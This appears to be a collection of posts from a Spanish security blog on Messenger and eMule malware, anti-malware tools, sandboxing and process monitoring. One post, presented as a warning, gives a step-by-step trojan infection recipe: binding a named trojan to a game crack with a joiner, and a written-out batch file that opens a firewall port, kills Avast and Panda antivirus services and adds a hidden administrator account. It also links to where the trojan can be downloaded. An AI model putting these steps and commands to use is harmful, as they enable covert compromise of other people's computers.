El MSN Messenger es uno de los programas de mensajera instantnea ms usados, esta circunstancia lo convierte en un buen foco de infeccin para malware, adems de que opera en el sistema operativo ms usado y con ms malware especifico para el, Windows. Este malware generalmente se propaga enviando archivos a los contactos de la victima, los contactos que reciben el archivo como creen que proviene de una fuente fiable abren el archivo y se infectan. Las actividades a las que se dedica este malware una vez infectado un sistema pueden ser varias: envi masivo de spam, espiar el usuario, convertir el sistema en zombie Para eliminar este malware del sistema se puede emplear una herramienta especfica para este tipo de amenazas para MSN Messenger, se trata de la herramienta MSNCleaner creada por InfoSpyware. Esta herramienta es conveniente usarla en el modo a prueba de fallos. En este modo Windows carga

los procesos mnimos de inicio, de forma que las tcnicas de la mayora de los virus para cargarse al inicio de Windows no funcionan. Des esta forma a MSNCleaner le ser mas fcil borrar el malware. Es una herramienta gratuita, que necesita registro en la pgina de InfoSpyware para poder descargarla. Ms informacin y descarga de MSNCleaner: http://www.forospyware.com/t92153.html Regstrate en InfoSpyware: http://www.forospyware.com/register.php?do=signup Seguridad en conversaciones de Messenger: http://vtroger.blogspot.com/cifrar-conversaciones-de-mensajera.html Uso seguro de Messenger: http://vtroger.blogspot.com/uso-seguro-de-mensajera-instantnea.html

Eliminar troyanos en lnea de comandos.

Es muy fcil utilizando la herramienta a-squared, es muy potente y completa. Posee la posibilidad de actualizar su base de datos y consume muy pocos recursos. Es ideal para maquinas obsoletas que aun trabajen en Windows 98 o ME. Esta versin del popular anti-malware asquared es totalmente gratuita y funciona en las plataformas: Windows 98, ME, 2000, XP, 2003 Server y Vista. Tambin se puede hacer un excelente uso de esta aplicacin en un cd de arranque de recuperacin del sistema, para limpiar el sistema sin tener los archivos infectados cargados en memoria. Ms informacin y descarga de a-squared en lnea de comandos en: http://www.emsisoft.es/es/software/download/ Antivirus lnea de comandos: http://vtroger.blogspot.com/2007/07/antivirus-ideal-para-ordenadores-con.html Detectar Malware desde DOS: http://vtroger.blogspot.com/2007/04/detectar-malware-desde-dos.html

Prcticas malware en emule II.

En un anterior post analizaba los resultados de una bsqueda en emule, de una cadena de palabras sin significado para simular una bsqueda con pocas fuentes. El resultado eran tres archivos generados con esa sentencia, ests archivos posean malware y uno de ellos un troyano. La aparicin de ests resultados en las bsquedas es fruto de servidores comprometidos o simplemente creados para este fin. Eses resultados actualmente han sufrido una alteracin que merece la pena reflexionar sobre ella y analizar, comparemos resultados: Este ejemplo con la cadena de palabras qwery realizado el 15 de mayo del 2007, daba tres resultados: Qwery fastest BitTorrent download.zip

Find qwery using emule multimedia toolbar.zip Watch Live TV and Find qwery usin TVtoolbar.zip Realizando esta misma prueba el 11 de junio de 2007 se obtenan los siguientes resultados: Download qwery with the fastest BitTorrent downloader.zip Find qwery using emule multimedia toolbar.zip View qwery with the ultimate player.zip Hoy 13 de noviembre de 2007 obtengo los siguientes resultados: qwery v1.4.7.3 Cracked.rar qwery Wallpapers.exe qwery Multilanguage.exe qwery No serial(crack).zip qwery Crack(osloskop.net).exe qwery Crack.rar qwery Keygen.exe qwery Genuine.Advantage.Validation.rar qwery Single player.rar qwery Serial CDs.exe qwery Reloaded.exe qwery Genuine Licence.rar qwery Soundtrack.exe qwery No-Dvd fixes.rar qwery Plug-In.exe A simple vista hay un cambio significativo, ms resultados y muy bien hechos para engaar, en el caso de buscar un crack para una aplicacin seria muy fcil caer en la trampa. Los archivos *.rar la mayora son programas espas sin mucho peligro para nuestro sistema como en los anteriores anlisis. En el caso de los archivos *.exe son troyanos pero con una peculiaridad muy interesante, no solo convierten nuestro sistema en zombie, tambin se dedican a instalar programas espas e infectar otros sistemas mediante correo electrnico o generando archivos compartidos para emule. Siempre hay que estar muy seguros de las fuentes de donde sacamos el software en este caso, en el emule es imposible. Un antivirus no es la solucin final contra el malware y los virus, se necesitan protecciones adicionales como firewall, programas antiespias, programas antirootkit y una concienciacin del usuario en materia de seguridad informtica (esto en un usuario comn consta de algunos conocimientos y sentido comn). Practicas malware en Emule I. http://vtroger.blogspot.com/2007/06/practicas-malware-en-emule.html Ordenadores zombies. http://vtroger.blogspot.com/2006/02/virus-zombis.html Tcnicas Malware: Falsos programas de seguridad informtica. http://vtroger.blogspot.com/2007/06/tcnicas-malware-falsos-programas-de.html

Tecnologa Sandbox, lo ultimo contra el malware.

Esta tecnologa consiste en crear un escenario virtual entre el sistema y una aplicacin como por ejemplo en el caso ms habitual de los escenarios de infeccin de malware, entre el navegador y el sistema operativo. Este escenario virtual denominado Sandbox es una maquina virtual con un sistema operativo. Esta maquina virtual utiliza prestaciones ROM BIOS, hardware simulado, unidades de disco duro simuladas... El SandBox emula la secuencia completa de arranque de un sistema normal cargando los archivos del sistema operativo y la estructura de comandos desde la unidad virtual. Esta unidad contendr los directorios y archivos necesarios del sistema, ajustando los archivos del sistema virtual a la de las unidades de disco fsicas. Cuando navegamos usando un entorno SandBox entre nuestro sistema y nuestro navegador los cambios que las aplicaciones malware haran en el sistema operativo, se efectuaran en el SandBox. Adems de impedir que los cambios se ejecuten en nuestro sistema, las acciones de las aplicaciones sospechosas en ese entorno simulado permiten a la aplicacin anti-malware saber que aplicacin seria potencialmente peligrosa. Aqu dejo enlaces de aplicaciones que utilizan esta tcnica. Ms informacin y descarga Sandboxie: http://www.sandboxie.com/ Ms informacin y descarga SafeSpace 1.1.96.0 Beta: http://www.artificialdynamics.com/content/products/personal-edition.aspx Mas informacin y descarga Norman Antivirus http://www.norman.com/es

Como obtener informacin de los procesos que corren en Windows.

En este post no voy a hablar de programas para monitorizar procesos, sino de pginas Web en las que podemos obtener informacin muy valiosa de los procesos que corren en nuestro sistema. En estas paginas hay informacin sobre procesos y sobre las aplicaciones de las que forman parte: si son programas espas, virus, troyanos, componentes de Windows Esta informacin nos puede ayudar a mejorar la seguridad de nuestros sistemas Windows. ProcessLibrary.com (Ingles): http://www.processlibrary.com/ WinTasks Process Library (Ingles): http://www.liutilities.com/products/wintaskspro/processlibrary/ ProcessID (Ingles): http://www.processid.com/processes.html Startup Application Knowledge Base (Ingles): http://www.windowsstartup.com/wso/browse.php

Yoreparo (Castellano): http://www.yoreparo.com/procesos/

Tcnicas Malware: Falsos programas de seguridad informtica.

Una tcnica Malware que se esta extendiendo mucho ltimamente, son los falsos programas de seguridad informtica, que te recomiendan que instales en anuncios de algunas webs. Ests programas de seguridad se anuncian como anti-spyware, pero lo que hacen es infectar tu sistema con malware, adems aunque tu sistema este limpio ests programas siempre dan falsos positivos para justificar su uso. Normalmente estos programas tienen otra caracterstica aadida y es que son difciles de desinstalar del sistema operativo. Mi consejo es siempre, no instalar ningn software sin asegurarse de que se puede confiar en el proveedor, o en la fuente de donde se descarga. En el caso de que se tenga instalado uno de esos programas, o se desconfi de algn software instalado en el sistema, puede buscar en la lista de webs y falsos programas de seguridad de spywarewarrior. Si tiene conocimientos avanzados puede monitorizar la aplicacin sospechosa, con una herramienta muy practica para monitorizar procesos, se trata de RunAlyzer de los creadores de una de las mejores herramientas contra malware, Spybot-S&D. En el caso de que quiera desinstalar la aplicacin sospechosa de malware, le recomiendo para ello la herramienta MyUninstaller, con muchsimas ms opciones que el complemento agregar o quitar programas de Windows. Y para borrar los restos de la aplicacin manualmente la herramienta FileASSASSIN. Mas informacin y descarga RunAlyzer: http://www.safer-networking.org/es/runalyzer/index.html Ms informacin y descarga MyUninstaller: http://www.nirsoft.net/utils/myuninst.html Borrar archivos bloqueados por Windows con FileASSASSIN: http://vtroger.blogspot.com/2007/03/borrar-archivos-bloqueados-por-windows.html Lista de programas y webs falsos de seguridad informtica en spywarewarrior: http://www.spywarewarrior.com/rogue_anti-spyware.htm Practicas malware en Emule: http://vtroger.blogspot.com/2007/06/practicas-malware-en-emule.html

Practicas malware en Emule.

Cuando buscamos en Emule algn archivo que no tiene muchas fuentes en algunos servidores se generan respuestas automticas con tres archivos, infectados con malware. Un ejemplo es cuando buscamos la palabra qwery: Este ejemplo realizado el 15 de mayo del 2007 daba tres resultados: Qwery fastest BitTorrent download.zip

Find qwery using emule multimedia toolbar.zip Watch Live TV and Find qwery usin TVtoolbar.zip Analizando estes archivos con Virustotal obtengo los siguientes resultados: Qwery fastest BitTorrent download.zip, 16 motores antivirus detectan este archivo como infectado por un troyano. Find qwery using emule multimedia.zip y Watch Live TV and Find qwery usin.zip no son detectados por ningn motor antivirus. Realizando esta misma prueba hoy 11 de junio de 2007 obtengo los siguientes resultados: Download qwery with the fastest BitTorrent downloader.zip Find qwery using emule multimedia toolbar.zip View qwery with the ultimate player.zip Analizando ests archivos con Virustotal obtengo los siguientes resultados: Download qwery with the fastest BitTorrent downloader.zip, 11 motores antivirus lo reconocen como un troyano. Find qwery using emule multimedia toolbar.zip, ningn motor antivirus lo reconoce como infectado. View qwery with the ultimate player.zip, 9 motores antivirus lo reconocen como infectado. Conclusiones de los anlisis: El archivo Qwery fastest BitTorrent download.zip ha cambiado de nombre a Download qwery with the fastest BitTorrent downloader.zip pero sigue conteniendo el mismo virus, le han aplicado tcnicas de morphing, para engaar el sistema de reconocimiento de firmas de los motores antivirus por eso ha pasado de ser reconocido por 16 motores a 11 motores antivirus. Find qwery using emule multimedia toolbar.zip, sigue sin ser reconocido por ningn motor antivirus pero es una barra multimedia con comportamiento de malware, recaba informacin de hbitos de navegacin para despus enviarlos a la red. View qwery with the ultimate player.zip, en otro troyano al que tambin se le han aplicado tcnicas de morphing, para engaar a los motores antivirus solo 9 motores lo reconocen. Watch Live TV and Find qwery usin TVtoolbar.zip, ya no aparece como resultado, aunque ningn antivirus lo reconoce es una barra para el navegador, con un comportamiento malware, tambin sirve para averiguar nuestros hbitos de navegacin. Conclusiones finales.

Siempre hay que estar muy seguros de las fuentes de donde sacamos el software en este caso, en el emule es imposible. Un antivirus no es la solucin final contra el malware y los virus, se necesitan protecciones adicionales como firewall, programas antiespias y programas antirootkit.

Post relacionados anteriormente publicados: Infectar un sistema fcilmente con un troyano. http://vtroger.blogspot.com/2006/08/infectar-un-sistema-fcilmente-con-un.html Forma comn de recibir un troyano. http://vtroger.blogspot.com/2005/10/forma-comn-de-recibir-un-troyano.html Antivirus, Cunto ms caro mejor? http://vtroger.blogspot.com/2005/10/antivirus-cunto-ms-caro-mejor.html 10 consejos de seguridad para un usuario. http://vtroger.blogspot.com/2005/10/10-consejos-de-seguridad-para-un.html Ordenadores zombies. http://vtroger.blogspot.com/2006/02/virus-zombis.html Acerca de Virustotal. http://vtroger.blogspot.com/2006/05/servicio-gratuito-de-anlisis-antivirus.html

Detectar Malware desde DOS.

Con Bughunter una aplicacin muy potente a la par que sencilla, que permite detectar malware desde cualquier PC que tenga un entorno DOS. Al funcionar en un entorno DOS la convierte en una aplicacin rpida y que consume pocos recursos. Ideal para guardar en disco de arranque o para detectar malware en maquinas con sistemas obsoletos. Ms informacin y descarga: http://bughunter.it-mate.co.uk/

Herramienta para identificar procesos sospechosos en Windows:

Con CurrPorts podemos obtener una lista de los procesos que tienen puertos TCP/UDP abiertos. Para cada puerto se muestra en la lista informacin sobre el proceso que abri el puerto, incluyendo la trayectoria conocida, la ruta del proceso, informacin de la versin del proceso (nombre del producto, descripcin del archivo), cuando se cargo el proceso y el usuario que lo cre. CurrPorts marca el con color rosado los procesos sospechosos y permite matarlos. Esta herramienta es muy buena para detectar malware que infecta nuestra sistema, sobre todo si la combinamos con Filemon podemos estudiar el comportamiento de procesos sospechosos. Informacin y descarga CurrPorts: http://www.nirsoft.net/utils/cports.html Filemon: http://vtroger.blogspot.com/2005/11/monitorear-procesos.html

Infectar un sistema fcilmente con un troyano.

Este post no es para fomentar la piratera, es un ejemplo de lo importante que es ejecutar archivos que no sabemos de donde proceden. Pasos para preparar la infeccin para Windows XP SP2: 1 Buscamos un troyano, son fciles de encontrar, google es nuestro mejor aliado. En este caso e usado uno muy sencillo y eficaz Cabronator 3. 2 Buscamos un Joiner, una herramienta que sirve para juntar los archivos ejecutables y hacer que uno se ejecute visible y otros invisibles. En este caso e usado Cactus Joiner 2.0 sacado de elhacker, un joiner que permite juntar 25 archivos y encryptarlos de forma que un antivirus no puede detectar virus adjuntos, hasta el momento de su ejecucin. 3 Un cebo, un crack de algn juego que este de moda. Este crack ser lo que juntemos con el troyano y un archivo bat para hacer mas eficaz el troyano. 4 Nos preparamos un bat que pueda abrir los puertos del troyano y desactive el antivirus. El bat del ejemplo solo desactiva el Panda y el Avast! pero se puede hacer con todos los antivirus. Ejemplo: :Esta linea abre el puerto del troyano en el firewall de windows Xp netsh firewall set portopenig tcp 5555 tcp5555 enable :Estas lineas desactivan el antivirus Avast! taskkill /f /im ashserv.exe taskkill /f /im ashdisp.exe taskkill /f /im ashmaisv.exe net stop avast! Antivirus net stop avast! iAVS4 Control Service net stop avast! Mail Scanner net stop avast! Web Scanner

:Estas el Panda taskkill /f /im APVXDWIN.EXE net stop Panda anti-virus service :Estas crean el usuario Alvaro con contrasea hola y le da privilegios net user Alvaro hola /add net localgroup administradores Alvaro /add 5 Despues juntamos el bat, el troyano y el cebo con el joiner y elegimos que todo se ejecute oculto menos el cebo en este caso un crack de un juego. 6 Solo nos queda un medio de difusin: e-mail, emule Este es un modelo de infeccin muy bsico, aunque el joiner oculte el troyano cuando se descomprima el antivirus lo detectara, pero al ejecutarse el bat desactiva el antivirus, con el inconveniente de que cuando se reinicie la maquina el antivirus se volver activar y encontrara el virus. Este post es para explicar porque no se deben ejecutar archivos adjuntos de correos electrnicos de fuentes desconocidas o archivos ejecutables descargados de sitios que no son de confianza. Cactus Joiner 2.0 http://foro.elhacker.net/index.php/topic=131276.0.html Troyano Cabronator 3 informacin: http://www.perantivirus.com/sosvirus/virufamo/cabronat.htm Troyano Cabronator 3 descarga: http://kakoweb.iespana.es/kakoweb/files/CaBrONaToR3KiLL.zip

Sencilla herramienta para controlar el malware.

Se trata de Winpatrol una herramienta de seguridad para Windows, muy sencilla que permite controlar los procesos y servicios que corren en el sistema, para prevenirlo de cdigos maliciosos como programas espas, troyanos Winpatrol te informa de los programas y servicios con detalles e informacin sobre ellos y opciones de configuracin. Tambin avisa de los cambios que los programas hacen en las partes sensibles del sistema y ofrece a la vez, la opcin de bloquear dichos cambios (una opcin que ayuda a detectar troyano o virus desconocidos por los antivirus). Adems con Winpatrol se puede: evitar que te cambien la pgina de inicio, filtrar cookies y evitar add-ons no deseadas del Internet Explorer. Mas informacin y descarga: http://www.winpatrol.com

Monitorear procesos.
En ms de una ocasin he tenido problemas a la hora de instalar aplicaciones y despus usarlas en usuarios sin privilegios, la aplicacin me daba errores sin especificar y Windows no informa mucho sobre las caractersticas de los procesos. La mayora de ests errores estn relacionados con permisos de carpetas y claves de registro. Para solucionar ests problemas yo les recomiendo unas herramientas gratuitas muy tiles, como son: Filemon para monitorizar procesos e indicarnos las acciones de dichos procesos, Regmon monitoriza entradas y uso del registro por parte de los procesos y Diskmon nos indica el uso del disco. Utilice estas herramientas cuando una aplicacin falle, incluso puede filtrar el monitoreo. Ejemplo: Si un programa le da un error desconocido y no se instala ponga estos monitores a funcionar y vuelva arrancar la instalacin, en el momento del fallo prelos y vera como obtiene mas informacin del fallo. Tambin es muy til para detectar procesos sospechosos como troyanos o virus. Ms informacin y descarga en: http://www.sysinternals.com/FileAndDiskUtilities.html